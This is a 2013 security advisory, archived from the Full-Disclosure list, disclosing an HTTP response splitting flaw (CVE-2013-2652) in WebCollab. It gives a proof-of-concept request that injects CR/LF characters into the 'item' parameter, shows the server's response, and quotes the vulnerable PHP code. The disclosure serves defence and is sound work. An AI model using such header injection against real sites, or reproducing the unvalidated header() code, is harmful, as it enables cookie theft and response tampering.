lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <5268CD11.8010704@isecauditors.com>
Date: Thu, 24 Oct 2013 09:32:33 +0200
From: ISecAuditors Security Advisories <advisories@...cauditors.com>
To: destinatarios-no-revelados:;
Subject: [ISecAuditors Security Advisories] HTTP Response
 Splitting Vulnerability in WebCollab <= v3.30

=============================================
INTERNET SECURITY AUDITORS ALERT 2013-011
- Original release date: March 21st, 2013
- Last revised:  March 21st, 2013
- Discovered by: Manuel García Cárdenas
- Severity: 5/10 (CVSS Base Score)
- CVE-ID: CVE-2013-2652
=============================================

I. VULNERABILITY
-------------------------
HTTP Response Splitting Vulnerability in WebCollab <= v3.30

II. BACKGROUND
-------------------------
WebCollab is a collaborative Web site for project workgroups. It aims to
be easy and intuitive to

use without being complicated or graphically intensive.

It uses a MySQL/PostgreSQL database backend coupled with PHP scripting
and the Apache webserver.

The last version of WebCollab is 3.30 (Aotuhia) released on February 2013.

III. DESCRIPTION
-------------------------
An input validation problem exists within WebCollab which allows
injecting CR (carriage return -

%0D or \r) and LF (line feed - %0A or \n) characters into the server
HTTP response header,

resulting in a HTTP Response Splitting Vulnerability.

The vulnerability exists in the "item" parameter on the page
"/help/help_language.php".

This vulnerability not only gives attackers control of the remaining
headers and body of the

server response, but also allows them to create additional responses
entirely under their

control.

IV. PROOF OF CONCEPT
-------------------------
Malicious Request:

http://vulnerablesite.com/webcollab/help/help_language.php?item=%0d%0a%20FakeHeader%3a

%20WriteYourOwnHeader&lang=en&type=help

Server Response:

HTTP/1.1 302 Found
Server: Apache/2.4.3 (Win32) OpenSSL/1.0.1c PHP/5.4.7
Location: http://vulnerablesite.com/webcollab/help/en_help.php#
 FakeHeader: WriteYourOwnHeader
Content-Length: 0
Content-Type: text/html

V. BUSINESS IMPACT
-------------------------
Attacker-supplied HTML or JavaScript code could run in the context of
the affected site,

potentially allowing an attacker to steal cookie-based authentication
credentials, control how

the site is rendered to the user, and influence or misrepresent how web
content is served,

cached, or interpreted. Other attacks are also possible.

VI. SYSTEMS AFFECTED
-------------------------
WebCollab <= v3.30

VII. SOLUTION
-------------------------
All data received by the application and can be modified by the user,
before making any kind of
transaction with them must be validated.

Validate the parameter "item" on the page "/help/help_language.php" line 34:

$help_item = $_GET['item'];

switch($_GET['type'] ) {
  case 'admin':
    header('Location:
'.BASE_URL.'help/'.$lang_prefix.'_help_admin.php#'.$help_item );
    break;

  case 'help':
  default:
    header('Location:
'.BASE_URL.'help/'.$lang_prefix.'_help.php#'.$help_item );
    break;

VIII. REFERENCES
-------------------------
http://webcollab.sourceforge.net
http://www.isecauditors.com

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel García Cárdenas (mgarcia (at) isecauditors (dot) com).

X. REVISION HISTORY
------------------------
March    21, 2013: Initial release

XI. DISCLOSURE TIMELINE
-------------------------
March      21, 2013: Vulnerability acquired by
                     Internet Security Auditors (www.isecauditors.com)
March      22, 2013: CVE-ID requested and received.
October    17, 2013: First contact with the developer. We send pre-advisory
October    18, 2013: Developer team release a new version
October    24, 2013: Advisory Release

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or

guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse

of this information.

XIII. ABOUT
-------------------------
Internet Security Auditors is a Spain based leader in web application
testing, network security,

penetration testing, security compliance
implementation and assessing. Our clients include some of the largest
companies in areas such as

finance, telecommunications, insurance, ITC, etc.
We are vendor independent provider with a deep expertise since 2001. Our
efforts in R&D include

vulnerability research, open security project
collaboration and whitepapers, presentations and security events
participation and promotion. For

further information regarding our security
services, contact us.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ